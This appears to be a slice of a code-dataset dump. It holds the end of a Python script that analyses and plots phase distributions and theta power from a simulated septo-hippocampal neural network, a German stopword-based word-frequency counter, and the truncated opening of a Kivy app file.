data_value[\"theta_part\"] )\n \n \n if (idx//10 == 0):\n without_pv1_pyr = np.append(without_pv1_pyr, data_value[\"pyramide\"])\n without_pv1_bas = np.append(without_pv1_bas, data_value[\"basket\"])\n without_pv1_olm = 
np.append(without_pv1_olm, data_value[\"olm\"])\n \n \n \n if (idx//10 == 1):\n without_pv2_pyr = np.append(without_pv2_pyr, data_value[\"pyramide\"])\n without_pv2_bas = np.append(without_pv2_bas, data_value[\"basket\"])\n without_pv2_olm = np.append(without_pv2_olm, data_value[\"olm\"])\n \n \n if (idx//10 == 2):\n without_pp_pyr = np.append(without_pp_pyr, data_value[\"pyramide\"])\n without_pp_bas = np.append(without_pp_bas, data_value[\"basket\"])\n without_pp_olm = np.append(without_pp_olm, data_value[\"olm\"])\n\n \n if (idx//10 == 3):\n without_cs_pyr = np.append(without_cs_pyr, data_value[\"pyramide\"])\n without_cs_bas = np.append(without_cs_bas, data_value[\"basket\"])\n without_cs_olm = np.append(without_cs_olm, data_value[\"olm\"])\n \n \n if (idx//10 == 4):\n without_ms_pyr = np.append(without_ms_pyr, data_value[\"pyramide\"])\n without_ms_bas = np.append(without_ms_bas, data_value[\"basket\"])\n without_ms_olm = np.append(without_ms_olm, data_value[\"olm\"])\n \n if (idx//10 == 5):\n without_ex_pyr = np.append(without_ex_pyr, data_value[\"pyramide\"])\n without_ex_bas = np.append(without_ex_bas, data_value[\"basket\"])\n without_ex_olm = np.append(without_ex_olm, data_value[\"olm\"]) \n \n \n \n without_pv1_pyr = np.append(without_pv1_pyr, without_pv1_pyr + 2*np.pi)\n without_pv1_bas = np.append(without_pv1_bas, without_pv1_bas + 2*np.pi)\n without_pv1_olm = np.append(without_pv1_olm, without_pv1_olm + 2*np.pi)\n \n without_pv2_pyr = np.append(without_pv2_pyr, without_pv2_pyr + 2*np.pi)\n without_pv2_bas = np.append(without_pv2_bas, without_pv2_bas + 2*np.pi)\n without_pv2_olm = np.append(without_pv2_olm, without_pv2_olm + 2*np.pi)\n \n without_pp_pyr = np.append(without_pp_pyr, without_pp_pyr + 2*np.pi)\n without_pp_bas = np.append(without_pp_bas, without_pp_bas + 2*np.pi)\n without_pp_olm = np.append(without_pp_olm, without_pp_olm + 2*np.pi)\n \n without_cs_pyr = np.append(without_cs_pyr, without_cs_pyr + 2*np.pi)\n without_cs_bas = np.append(without_cs_bas, without_cs_bas + 2*np.pi)\n without_cs_olm = np.append(without_cs_olm, without_cs_olm + 2*np.pi)\n \n without_ms_pyr = np.append(without_ms_pyr, without_ms_pyr + 2*np.pi)\n without_ms_bas = np.append(without_ms_bas, without_ms_bas + 2*np.pi)\n without_ms_olm = np.append(without_ms_olm, without_ms_olm + 2*np.pi) \n \n without_ex_pyr = np.append(without_ex_pyr, without_ex_pyr + 2*np.pi)\n without_ex_bas = np.append(without_ex_bas, without_ex_bas + 2*np.pi)\n without_ex_olm = np.append(without_ex_olm, without_ex_olm + 2*np.pi) \n \n \n \n \n fig, axs = plt.subplots(nrows=3, ncols=6, figsize=(20, 10), tight_layout=True, sharex=True, sharey=True)\n axs[0, 0].hist(without_pv1_pyr, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"pyr\"])\n axs[1, 0].hist(without_pv1_bas, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"bas\"])\n axs[2, 0].hist(without_pv1_olm, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"olm\"])\n \n axs[0, 1].hist(without_pv2_pyr, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"pyr\"])\n axs[1, 1].hist(without_pv2_bas, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"bas\"])\n axs[2, 1].hist(without_pv2_olm, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"olm\"])\n \n axs[0, 2].hist(without_pp_pyr, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"pyr\"])\n axs[1, 2].hist(without_pp_bas, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"bas\"])\n axs[2, 2].hist(without_pp_olm, bins=40, normed=True, alpha=0.75, 
color=neurons_colors[\"olm\"])\n\n axs[0, 3].hist(without_cs_pyr, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"pyr\"])\n axs[1, 3].hist(without_cs_bas, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"bas\"])\n axs[2, 3].hist(without_cs_olm, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"olm\"])\n \n \n axs[0, 4].hist(without_ms_pyr, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"pyr\"])\n axs[1, 4].hist(without_ms_bas, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"bas\"])\n axs[2, 4].hist(without_ms_olm, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"olm\"])\n \n axs[0, 5].hist(without_ex_pyr, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"pyr\"])\n axs[1, 5].hist(without_ex_bas, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"bas\"])\n axs[2, 5].hist(without_ex_olm, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"olm\"])\n \n \n \n phases = np.linspace(-np.pi, 3*np.pi, 200)\n signal = 0.25 * (np.cos(phases) + 1)\n \n for idx in range(3):\n for ax in axs[idx]:\n ax.plot(phases, signal, color=\"black\", linewidth=2)\n ax.set_xlim(-np.pi, 3*np.pi)\n ax.set_ylim(0, 0.5)\n ax.xaxis.set_tick_params(labelsize=36)\n ax.yaxis.set_tick_params(labelsize=36)\n fig.savefig(saving_path + \"without_any_inputs.png\", dpi=500)\n \n \n \n theta_part = theta_part.reshape(7, 10).T\n fig = plt.figure()\n plt.boxplot(theta_part, sym=\"\")\n # plt.ylim(0, 0.2)\n fig.savefig(saving_path + \"without_any_inputs_theta_power.png\", dpi=500)\n \n\ndef pv1_pv2_phase_shift(processed_data, saving_path):\n \n pyr_2_15 = np.array([], dtype=float)\n bas_2_15 = np.array([], dtype=float)\n olm_2_15 = np.array([], dtype=float)\n\n pyr_pi = np.array([], dtype=float)\n bas_pi = np.array([], dtype=float)\n olm_pi = np.array([], dtype=float)\n\n for idx, data in enumerate(processed_data):\n if idx < 5:\n pyr_2_15 = np.append(pyr_2_15, data[\"pyramide\"])\n bas_2_15 = np.append(bas_2_15, data[\"basket\"])\n olm_2_15 = np.append(olm_2_15, data[\"olm\"])\n else:\n pyr_pi = np.append(pyr_pi, data[\"pyramide\"])\n bas_pi = np.append(bas_pi, data[\"basket\"])\n olm_pi = np.append(olm_pi, data[\"olm\"])\n \n pyr_2_15 = np.append(pyr_2_15, pyr_2_15 + 2*np.pi)\n bas_2_15 = np.append(bas_2_15, bas_2_15 + 2*np.pi)\n olm_2_15 = np.append(olm_2_15, olm_2_15 + 2*np.pi)\n \n pyr_pi = np.append(pyr_pi, pyr_pi + 2*np.pi)\n bas_pi = np.append(bas_pi, bas_pi + 2*np.pi)\n olm_pi = np.append(olm_pi, olm_pi + 2*np.pi) \n \n \n \n fig, axs = plt.subplots(nrows=3, ncols=2, sharex=True)\n axs[0, 0].hist(pyr_2_15, bins=40, normed=True, alpha=0.75)\n axs[1, 0].hist(bas_2_15, bins=40, normed=True, alpha=0.75)\n axs[2, 0].hist(olm_2_15, bins=40, normed=True, alpha=0.75)\n \n axs[0, 1].hist(pyr_pi, bins=40, normed=True, alpha=0.75)\n axs[1, 1].hist(bas_pi, bins=40, normed=True, alpha=0.75)\n axs[2, 1].hist(olm_pi, bins=40, normed=True, alpha=0.75)\n \n \n phases = np.linspace(-np.pi, 3*np.pi, 200)\n signal = 0.25 * (np.cos(phases) + 1)\n \n for idx in range(3):\n for ax in axs[idx]:\n ax.plot(phases, signal, linewidth=2)\n ax.set_xlim(-np.pi, 3*np.pi)\n ax.set_ylim(0, 0.5)\n\n \n fig.tight_layout()\n fig.savefig(saving_path + \"pv1-pv2_phase_shift.png\", dpi=500)\n \n\ndef balance_cs_bas2pyr(processed_data, saving_path):\n \n number_synapses = np.arange(0, 110, 10, dtype=int)\n \n data_mean_pyr = []\n data_varience_pyr = []\n \n data_mean_bas = []\n data_varience_bas = []\n\n data_mean_olm = []\n data_varience_olm = []\n \n theta_part = []\n \n pyr_tmp = np.array([], 
dtype=float)\n bas_tmp = np.array([], dtype=float)\n olm_tmp = np.array([], dtype=float)\n theta_tmp = np.array([], dtype=float)\n \n for idx, data_value in enumerate(processed_data):\n \n \n pyr_tmp = np.append(pyr_tmp, data_value[\"pyramide\"])\n bas_tmp = np.append(bas_tmp, data_value[\"basket\"])\n olm_tmp = np.append(olm_tmp, data_value[\"olm\"])\n theta_tmp = np.append(theta_tmp, data_value[\"theta_part\"])\n \n \n if ( (idx+1)%10 == 0 ):\n \n \n data_mean_pyr.append( circmean(pyr_tmp, high=np.pi, low=-np.pi) )\n data_varience_pyr.append( circstd(pyr_tmp, high=np.pi, low=-np.pi) )\n \n data_mean_bas.append( circmean(bas_tmp, high=np.pi, low=-np.pi) )\n data_varience_bas.append( circstd(bas_tmp, high=np.pi, low=-np.pi) )\n \n data_mean_olm.append( circmean(olm_tmp, high=np.pi, low=-np.pi) )\n data_varience_olm.append( circstd(olm_tmp, high=np.pi, low=-np.pi) )\n \n theta_part.append(theta_tmp)\n \n pyr_tmp = np.array([], dtype=float)\n bas_tmp = np.array([], dtype=float)\n olm_tmp = np.array([], dtype=float)\n theta_tmp = np.array([], dtype=float)\n \n colors = get_colors()\n phases = np.linspace(-2*np.pi, 2*np.pi, 100)\n wave = np.median(number_synapses) + 20 * np.cos(phases)\n fig, axs = plt.subplots(nrows=1, ncols=3, sharey=True)\n \n axs[0].errorbar(data_mean_pyr, number_synapses, xerr=data_varience_pyr, fmt='o', color=colors[\"pyr\"])\n axs[0].set_title('Pyr')\n \n axs[1].errorbar(data_mean_bas, number_synapses, xerr=data_varience_bas, fmt='o', color=colors[\"bas\"])\n axs[1].set_title('Bas')\n \n axs[2].errorbar(data_mean_olm, number_synapses, xerr=data_varience_olm, fmt='o', color=colors[\"olm\"])\n axs[2].set_title('OLM')\n \n for ax in axs:\n # ax.set_xlim(-np.pi, 3*np.pi)\n ax.plot(phases, wave, color=\"black\", linewidth=2)\n ax.set_xlim(-2*np.pi, 2*np.pi)\n \n fig.tight_layout()\n fig.savefig(saving_path + \".png\", dpi=500)\n \n \n theta_part_mean = np.zeros(number_synapses.size)\n theta_part_std = np.zeros(number_synapses.size)\n \n for idx, t in enumerate(theta_part):\n theta_part_mean[idx] = np.mean(t)\n theta_part_std[idx] = np.std(t)\n \n \n fig, axs = plt.subplots()\n \n axs.errorbar(number_synapses, theta_part_mean, yerr=theta_part_std, fmt='o')\n # axs.set_ylim(0, 0.3)\n axs.set_title('Relative theta power')\n \n fig.savefig(saving_path + \"_theta_part.png\", dpi=500)\n \n\ndef tonic_currents(processed_data, saving_path):\n tonic_carrents = np.linspace(-2, 1, 7)\n\n data_mean_pyr = []\n data_varience_pyr = []\n \n data_mean_bas = []\n data_varience_bas = []\n\n data_mean_olm = []\n data_varience_olm = []\n \n theta_part = []\n \n pyr_tmp = np.array([], dtype=float)\n bas_tmp = np.array([], dtype=float)\n olm_tmp = np.array([], dtype=float)\n theta_tmp = np.array([], dtype=float)\n \n for idx, data_value in enumerate(processed_data):\n \n \n pyr_tmp = np.append(pyr_tmp, data_value[\"pyramide\"])\n bas_tmp = np.append(bas_tmp, data_value[\"basket\"])\n olm_tmp = np.append(olm_tmp, data_value[\"olm\"])\n theta_tmp = np.append(theta_tmp, data_value[\"theta_part\"])\n \n \n if ( (idx+1)%10 == 0 ):\n \n \n data_mean_pyr.append( circmean(pyr_tmp, high=np.pi, low=-np.pi) )\n data_varience_pyr.append( circstd(pyr_tmp, high=np.pi, low=-np.pi) )\n \n data_mean_bas.append( circmean(bas_tmp, high=np.pi, low=-np.pi) )\n data_varience_bas.append( circstd(bas_tmp, high=np.pi, low=-np.pi) )\n \n data_mean_olm.append( circmean(olm_tmp, high=np.pi, low=-np.pi) )\n data_varience_olm.append( circstd(olm_tmp, high=np.pi, low=-np.pi) )\n \n theta_part.append(theta_tmp)\n \n pyr_tmp = 
np.array([], dtype=float)\n bas_tmp = np.array([], dtype=float)\n olm_tmp = np.array([], dtype=float)\n theta_tmp = np.array([], dtype=float)\n \n colors = get_colors()\n phases = np.linspace(-2*np.pi, 2*np.pi, 100)\n wave = np.median(tonic_carrents) + np.cos(phases)\n fig, axs = plt.subplots(nrows=1, ncols=3, sharey=True)\n \n axs[0].errorbar(data_mean_pyr, tonic_carrents, xerr=data_varience_pyr, fmt='o', color=colors[\"pyr\"])\n axs[0].set_title('Pyr')\n \n axs[1].errorbar(data_mean_bas, tonic_carrents, xerr=data_varience_bas, fmt='o', color=colors[\"bas\"])\n axs[1].set_title('Bas')\n \n axs[2].errorbar(data_mean_olm, tonic_carrents, xerr=data_varience_olm, fmt='o', color=colors[\"olm\"])\n axs[2].set_title('OLM')\n \n for ax in axs:\n # ax.set_xlim(-np.pi, 3*np.pi)\n ax.plot(phases, wave, color=\"black\", linewidth=2)\n ax.set_xlim(-2*np.pi, 2*np.pi)\n \n fig.tight_layout()\n fig.savefig(saving_path + \".png\", dpi=500)\n \n \n theta_part_mean = np.zeros(tonic_carrents.size)\n theta_part_std = np.zeros(tonic_carrents.size)\n \n for idx, t in enumerate(theta_part):\n theta_part_mean[idx] = np.mean(t)\n theta_part_std[idx] = np.std(t)\n \n \n fig, axs = plt.subplots()\n \n axs.errorbar(tonic_carrents, theta_part_mean, yerr=theta_part_std, fmt='o')\n axs.set_ylim(0, 0.2)\n axs.set_title('Relative theta power')\n \n fig.savefig(saving_path + \"_theta_part.png\", dpi=500) \n \n return None\n\n####################################\ndef plot_whole_phase_distribution(processed_data, saving_path):\n\n \n pyr = np.array([], dtype=float)\n bas = np.array([], dtype=float)\n olm = np.array([], dtype=float)\n \n for idx, data_value in enumerate(processed_data):\n \n pyr = np.append(pyr, data_value[\"pyramide\"])\n bas = np.append(bas, data_value[\"basket\"])\n olm = np.append(olm, data_value[\"olm\"])\n\n pyr = np.append(pyr, pyr + 2*np.pi )\n bas = np.append(bas, bas + 2*np.pi )\n olm = np.append(olm, olm + 2*np.pi )\n neurons_colors = get_colors()\n\n phases_x = np.linspace(-np.pi, 3*np.pi, 40)\n phases_y = 0.75*0.5*( np.cos(phases_x) + 1.0)\n plt.figure( tight_layout=True )\n plt.subplot(311)\n plt.hist(pyr, 40, normed=True, facecolor=neurons_colors[\"pyr\"], alpha=0.75)\n plt.plot(phases_x, phases_y, color=\"black\")\n plt.xlim(-np.pi, 3*np.pi)\n plt.ylim(0, 0.75)\n plt.subplot(312)\n plt.hist(bas, 40, normed=True, facecolor=neurons_colors[\"bas\"], alpha=0.75)\n plt.plot(phases_x, phases_y, color=\"black\")\n plt.xlim(-np.pi, 3*np.pi)\n plt.ylim(0, 0.75)\n plt.subplot(313)\n plt.hist(olm, 40, normed=True, facecolor=neurons_colors[\"olm\"], alpha=0.75)\n plt.plot(phases_x, phases_y, color=\"black\")\n plt.xlim(-np.pi, 3*np.pi)\n plt.ylim(0, 0.75)\n plt.tight_layout()\n plt.savefig(saving_path + \"phase_disribution_histogram.png\", dpi = 500)\n\ndef plot_theta_part(data, path):\n new_data = []\n \n \n \n for d in data:\n \n theta_part_tmp = np.array([], dtype=float)\n \n for t in d:\n theta_part_tmp = np.append(theta_part_tmp, t[\"theta_part\"])\n \n new_data.append(theta_part_tmp)\n \n \n \n plt.figure()\n plt.boxplot(new_data, sym=\"\")\n plt.tight_layout()\n plt.savefig(path + \"theta_part.png\", dpi = 500)\n \n \n \ndef keySorter(item):\n try:\n key = int(item[0:3])\n except ValueError:\n try:\n key = int(item[0:2])\n except ValueError:\n try:\n key = int(item[0])\n except ValueError:\n key = 0\n \n return key\n\n\n\nseptumInModel = False\nmain_path = \"/home/ivan/Data/modeling_septo_hippocampal_model/hippocampal_model/\" \n\n\"\"\"\n\npath = main_path + \"basic_model_test/\"\n\n\ncontrol_data 
= []\n\n\nfor file in sorted( os.listdir(path), key = keySorter ):\n if os.path.splitext(file)[1] != \".npy\":\n continue\n\n print (file)\n \n ret = make_figures(path, file, septumInModel)\n #ret = make_calculation(path, file)\n control_data.append( ret )\n# plot_whole_phase_distribution(control_data, main_path)\n\"\"\"\n\n\n\n\n\"\"\"\npath = main_path + \"without_of_each_input/\" # \"basic_model_high_pp/\"\n\n\nhigh_pp = []\n\n\nfor file in sorted( os.listdir(path), key = keySorter ):\n if os.path.splitext(file)[1] != \".npy\":\n continue\n \n \n tmp = file[0:2]\n try:\n tmp_int = int (tmp)\n except ValueError:\n try:\n tmp_int = int (tmp[0])\n except ValueError:\n continue\n \n if not(tmp_int >= 1 and tmp_int <= 10):\n continue\n \n \n print (file)\n \n ret = make_figures(path, file, septumInModel)\n #ret = make_calculation(path, file)\n high_pp.append( ret )\n\nplot_whole_phase_distribution(high_pp, main_path + \"(-ms1)_\")\n\n\npath = main_path + \"without_of_each_input/\"\n\n\nlow_cs = []\n\n\nfor file in sorted( os.listdir(path), key = keySorter ):\n if os.path.splitext(file)[1] != \".npy\":\n continue\n tmp = file[0:2]\n try:\n tmp_int = int (tmp)\n except ValueError:\n continue\n # if (file != '51__all_results.npy'):continue\n if not(tmp_int >= 11 and tmp_int <= 20):\n continue\n\n\n\n\n print (file)\n \n ret = make_figures(path, file, septumInModel)\n #ret = make_calculation(path, file)\n low_cs.append( ret )\n#\nplot_whole_phase_distribution(low_cs, main_path + \"(-ms2)_\")\n#data = [control_data, high_pp, low_cs]\n#\n#plot_theta_part(data, main_path)\n\n\n\n\npath = main_path + \"without_of_each_input/\"\n\n\nlow_ms = []\n\n\nfor file in sorted( os.listdir(path), key = keySorter ):\n if os.path.splitext(file)[1] != \".npy\":\n continue\n tmp = file[0:2]\n try:\n tmp_int = int (tmp)\n except ValueError:\n try:\n tmp_int = int (tmp[0])\n except ValueError:\n continue\n # if (file != '51__all_results.npy'):continue\n if not(tmp_int >= 41 and tmp_int <= 49):\n continue\n\n\n\n\n print (file)\n \n ret = make_figures(path, file, septumInModel)\n #ret = make_calculation(path, file)\n low_ms.append( ret )\n\nplot_whole_phase_distribution(low_ms, main_path + \"(-ms1and2)_\")\ndata = [control_data, high_pp, low_cs, low_ms]\n\nplot_theta_part(data, main_path)\n\"\"\"\n\n\n\nprocessed_data = []\n\n# path = main_path + \"ms_cs_pp_phase_shift2/\"\n# path = main_path + \"without_of_each_input/\"\n# path = main_path + \"no_rhythm_in_each_input(same frequency of random)/\" # \"no_rhythm_in_each_input/\"\n# path = main_path + \"ms_pv1_pv2_phase_shift/\"\n# path = main_path + \"bas_inputs_density/\"\n# path = main_path + \"olm_inputs_density/\"\n\n# path = main_path + \"bas_tonic_current/\"\npath = main_path + \"olm_tonic_current/\"\n# path = main_path + \"pyramide_dendrite_tonic_current/\"\n# path = main_path + \"pyramide_soma_tonic_current/\"\n \n \nfor file in sorted( os.listdir(path), key = keySorter ):\n if os.path.splitext(file)[1] != \".npy\":\n continue\n # if (file != '33__all_results.npy'):continue\n print (file)\n \n # ret = make_figures(path, file, septumInModel)\n ret = make_calculation(path, file)\n processed_data.append( ret )\n \n\n\n#ms_cs_pp_phase_shift_processing(processed_data, main_path)\n# without_of_each_input_processing(processed_data, control_data, main_path)\n# without_of_each_input_processing(processed_data, control_data, main_path+\"no_rhythms_same_frequency_\")\n# pv1_pv2_phase_shift(processed_data, main_path)\n# balance_cs_bas2pyr(processed_data, main_path + 
\"bas_inputs_density\")\n# balance_cs_bas2pyr(processed_data, main_path + \"olm_inputs_density\")\n\n# tonic_currents(processed_data, main_path + \"bas_tonic_current\")\ntonic_currents(processed_data, main_path + \"olm_tonic_current\")\n# tonic_currents(processed_data, main_path + \"pyr_dendrite_tonic_current\")\n# tonic_currents(processed_data, main_path + \"pyr_soma_tonic_current\")\n\n\n","repo_name":"ivanmysin/septo-hippocampal-model","sub_path":"cython_code/lfp_processing.py","file_name":"lfp_processing.py","file_ext":"py","file_size_in_byte":46529,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33738517217","text":"import string\nimport operator\n\nSTOPWORDS = {'der', 'die', 'das', 'aus', 'in', 'eine', 'und', 'ich', 'sein', 'nach', 'ein', 'wie', 'zu', 'ihr',\n 'von', 'um', 'haben', 'aber', 'werden', 'so', 'mit', 'jahr', 'an', 'nur', 'noch', 'auf', 'über', 'sich',\n 'wir', 'für', 'viel', 'nicht', 'man', 'es', 'oder', 'sie', 'vor', 'er', 'müssen', 'auch', 'all', 'als',\n 'sollen', 'bei', 'kein', 'dies', 'bis', 'dass', 'sagen', 'können', 'wollen', 'jahr', 'neu', 'werden',\n 'land', 'machen', 'uhr', 'haben', 'alt', 'gehen', 'prozent', 'gross', 'sein', 'hoch', 'stehen',\n 'können', 'ende', 'jung', 'lassen', 'viel', 'müssen', 'nahe', 'sehen', 'sollen', 'finden', 'gut',\n 'sagen', 'seite', 'lang', 'bleiben', 'weit', 'geben', 'vergangen', 'liegen', 'klein', 'kommen', 'leben',\n 'wenig', 'dürfen', 'eigen', 'wollen', 'ganz', 'stellen', 'haben', 'lang', 'machen', 'klein', 'sein',\n 'jung', 'geben', 'hand', 'werden', 'blick', 'weit', 'auge', 'gut', 'den', 'ist', 'des', 'im', 'dem',\n 'hat', 'sind', 'sei', 'war', 'einem', 'wird', 'wenn', 'sagt', 'am', 'einer', 'einen', 'mehr', 'zum',\n 'diese', 'gegen', 'habe', 'zur', 'sagte', 'hatte', 'nun', 'keine', 'unter', 'seit', 'damit', 'seien',\n 'will', 'soll', 'kann', 'wurde', 'ihre', 'vom', 'bereits', 'gibt', 'jedoch', 'weiterhin', 'wegen',\n 'geht', 'hätten', 'allerdings', '', 'derselben', 'allen', 'ja', 'eben', 'wieder', 'ersten', 'einiges', 'ins', 'offen', 'welche',\n 'hattest', 'ohne', 'zu', 'ihrem', 'weiteres', 'jenem', 'darin', 'anders', 'richtig', 'na', 'u', 'wahr?',\n 'viel', 'sechste', 'rund', 'fünfte', 'zwölf', 'gott', 'geschweige', 'bei', 'gut', 'durften', 'sowie',\n 'ging', 'grosses', 'manchem', 'dritten', 'jener', 'und?', 'lang', 'einmal', 'machte', 'wenn', 'meiner',\n 'ganze', 'vielleicht', 'unsen', 'diesen', 'etwa', 'wäre', 'hinter', 'los', 'zweite', 'ganzes', 'solche',\n 'manchen', 'soll', 'wenigstens', 'zwischen', 'erste', 'solang', 'wollten', 'endlich', 'zwei', 'jetzt',\n 'außer', 'dieselben', 'demgemäss', 'etwas', 'davon', 'können', 'bekannt', 'gehen', 'ausserdem', 'mussten',\n 'danach', 'sollst', 'grosser', 'der', 'gute', 'wessen', 'auch', 'ach', 'uhr', 'daran', 'daneben', 'kann',\n 'dem', 'seinem', 'alles', 'jemanden', 'zum', 'mag', 'c', 'solchen', 'l', 'solchem', 'ihr', 'sind', 'achte',\n 'gedurft', 'worden', 'deines', 'könnt', 'trotzdem', 'rechte', 'werden', 'zwanzig', 'besser', 'gehabt',\n 'wirklich', 'diejenigen', 'jeden', 'keines', 'neue', 'nicht', 'währenddessen', 'konnten', 'kommen',\n 'seien', 'unse', 'darauf', 'ab', 'ganzer', 'dessen', 'sie', 'muß', 'meinem', 'neun', 'müßt', 'anderer',\n 'sechs', 'vor', 'dürft', 'wie', 'nie', 'a', 'zugleich', 'zehnter', 'd', 'einem', 'er', 'will', 'i',\n 'denselben', 'für', 'darfst', 'steht', 'großer', 'meines', 'siebentes', 'damals', 'dieser', 'gross',\n 'würden', 'wer', 'zehnten', 'weg', 'acht', 'gar', 'warst', 'b', 'achter', 
'jedem', 'bin', 'früher',\n 'dementsprechend', 'damit', 'großen', 'es', 'q', 'später', 'niemandem', 'achten', 'besonders', 'eigenen',\n 'natürlich', 'übrigens', 'zeit', 'dies', 'andern', 'aus', 'ei,', 'ihres', 'seiner', 'euren', 'eine', 'hin',\n 'ob', 'dein', 'was', 'eurem', 'wurde', 'haben', 'schluss', 'erster', 'dir', 'j', 'eigenes', 'und', 'sei',\n 'fünf', 'außerdem', 'soweit', 'entweder', 'seit', 'seine', 'r', 'sieben', 'über', 'mögt', 'zehn',\n 'einigem', 'ordnung', 'indem', 'solcher', 'tage', 'vierten', 'große', 'hätte', 'habt', 'dort', 'her',\n 'unter', 'mir', 'daher', 'wird', 'meinen', 'darunter', 'in', 'dazu', 'macht', 'dahin', 'vergangenen',\n 'dermassen', 'seines', 'wenige', 'heisst', 'ei', 'welcher', 'demzufolge', 'jedermanns', 'konnte',\n 'weniges', 'allerdings', 'demselben', 'wollt', 'hab', 'viertes', 'dann', 'kaum', 'derjenige', 'gutes',\n 'deinen', 'eurer', 'zuerst', 'd.h', 'sagte', 'derer', 'kurz', 'niemand', 'zweiten', 'wurden', 'ich',\n 'unserer', 'dich', 'dafür', 'neunter', 'meine', 'wieso', 'ebenso', 'mußt', 'werde', 'startseite', 'den',\n 'tag', 'sich', 'gegenüber', 'bald', 'schlecht', 'sehr', 'z.b', 'je', 'n', 'derjenigen', 'muss', 'manches',\n 'musst', 'das', 'x', 'gewesen', 'ein', 'unses', 'gemacht', 'p', 'jahr', 'seinen', 'unsere', 'dahinter',\n 'auf', 'sollte', 'du', 'alle', 'fünfter', 'beide', 'die', 'währenddem', 'eure', 'jemand', 'jedes',\n 'magst', 'morgen', 'anderem', 's', 'o', 'hier', 'mann', 'viele', 'wegen', 'gern', 'davor', 'grosse',\n 'solches', 'jede', 'sollten', 'sollt', 'ganz', 'diesem', 'mal', 'aller', 'erstes', 'gleich', 'zehntes',\n 'dadurch', 'so', 'siebente', 'einander', 'welchem', 'oft', 'nach', 'wir', 'mein', 'nein', 'gegen', 'dass',\n 'bist', 'zweites', 'möglich', 'derselbe', 'weiteren', 'schon', 'überhaupt', 'dagegen', 'seid', 'w', 'war',\n 'ende', 'jeder', 'andere', 'gab', 'uns', 'gewollt', 'waren', 'welchen', 'infolgedessen', 'durfte', 'woher',\n 'wollte', 'ihnen', 'gekannt', 'irgend', 'drei', 'jemandem', 'y', 'mit', 'darum', 'jenes', 'seitdem',\n 'mittel', 'fünftes', 'nachdem', 'erst', 'allem', 'siebenter', 'neuntes', 'durchaus', 'mehr', 'keiner',\n 'euch', 'tritt', 'niemanden', 'zehnte', 'demgemäß', 'dank', 'vierte', 'sache', 'hast', 'vielen', 'unser',\n 'einer', 'zwar', 'dazwischen', 'zusammen', 'habe', 'ihn', 'dasselbe', 'dasein', 'wollen', 'eigene',\n 'einigen', 'ernst', 'unsem', 'ihrer', 'oder', 'deren', 'ag', 'beim', 'wohl', 'mensch', 'vom', 'könnte',\n 'hoch', 'gerade', 'vielem', 'hätten', 'tun', 'jene', 'dieselbe', 't', 'machen', 'wirst', 'jenen',\n 'keine', 'neuen', 'weil', 'oben', 'f', 'daraus', 'mahn', 'deine', 'jahren', 'sagt', 'während', 'z',\n 'drittes', 'vier', 'ihre', 'wen', 'wohin', 'mögen', 'wissen', 'einiger', 'besten', 'darf', 'einen',\n 'geworden', 'tel', 'keinem', 'eigener', 'denn', 'mochten', 'darüber', 'wann', 'dabei', 'neunten', 'man',\n 'also', 'anderen', 'nahm', 'drin', 'keinen', 'wart', 'willst', 'hatte', 'rechten', 'neunte', 'diese',\n 'ander', 'au', 'ist', 'dürfen', 'zur', 'demgegenüber', 'bereits', 'lieber', 'gemocht', 'selbst', 'kleinen',\n 'wem', 'tat', 'weitere', 'würde', 'recht', 'deshalb', 'da', 'hattet', 'mich', 'gibt', 'deiner', 'immer',\n 'ihren', 'aber', 'teil', 'kleiner', 'werdet', 'deswegen', 'dieses', 'menschen', 'kein', 'hat', 'sa',\n 'deinem', 'großes', 'von', 'anderes', 'ehrlich', 'anderm', 'weniger', 'rechter', 'suche', 'allein',\n 'zunächst', 'grossen', 'einig', 'sechstes', 'jedermann', 'an', 'statt', 'ihm', 'rechtes', 'möchte',\n 'hatten', 'ausser', 'heute', 'daselbst', 'euer', 'beiden', 
'musste', 'sechsten', 'nur', 'im', 'durch',\n 'siebenten', 'folgende', 'ganzen', 'denen', 'zweiter', 'k', 'sondern', 'kommt', 'welches', 'g', 'm', 'am',\n 'jahre', 'en', 'vierter', 'leide', 'bis', 'sein', 'jedoch', 'eigen', 'elf', 'weit', 'bisher', 'e',\n 'müssen', 'groß', 'kam', 'dritte', 'dritter', 'mochte', 'desselben', 'einige', 'eines', 'nun', 'sollen',\n 'allgemeinen', 'satt', 'daß', 'tagen', 'leicht', 'manche', 'kleine', 'gemusst', 'noch', 'lange', 'v',\n 'weshalb', 'eins', 'achtes', 'nichts', 'weiter', 'fünften', 'diejenige', 'gesagt', 'doch', 'wenig',\n 'kannst', 'beispiel', 'zurück', 'warum', 'sah', 'kleines', 'anderr', 'wo', 'guter', 'sonst', 'mancher',\n 'eures', 'dermaßen', 'müsst', 'sechster', 'h', 'genug', 'als', 'des', 'neben', 'gekonnt', 'geht', 'um',\n 'Zudem', 'document',\n }\n\ndatei = input(\"Textdatei: \")\ncontent = open(datei).read()\nfor zeichen in string.punctuation:\n content = content.replace(zeichen, \" \").lower()\nwoerter = content.split()\nword = [w for w in woerter if w not in STOPWORDS]\ndict = {}\nfor i in word:\n dict[i] = word.count(i)\n\nsorted_dict = sorted(dict.items(), key=operator.itemgetter(1))\nsorted_dict.reverse()\nprint(sorted_dict) \n","repo_name":"tschaeggi/Wordcounter3000","sub_path":"wordcounter3000.py","file_name":"wordcounter3000.py","file_ext":"py","file_size_in_byte":8453,"program_lang":"python","lang":"als","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2375021742","text":"import kivy\nkivy.require('1.0.7')\nfrom kivy.app import App\nfrom Model import *\nimport StringIO\nfrom 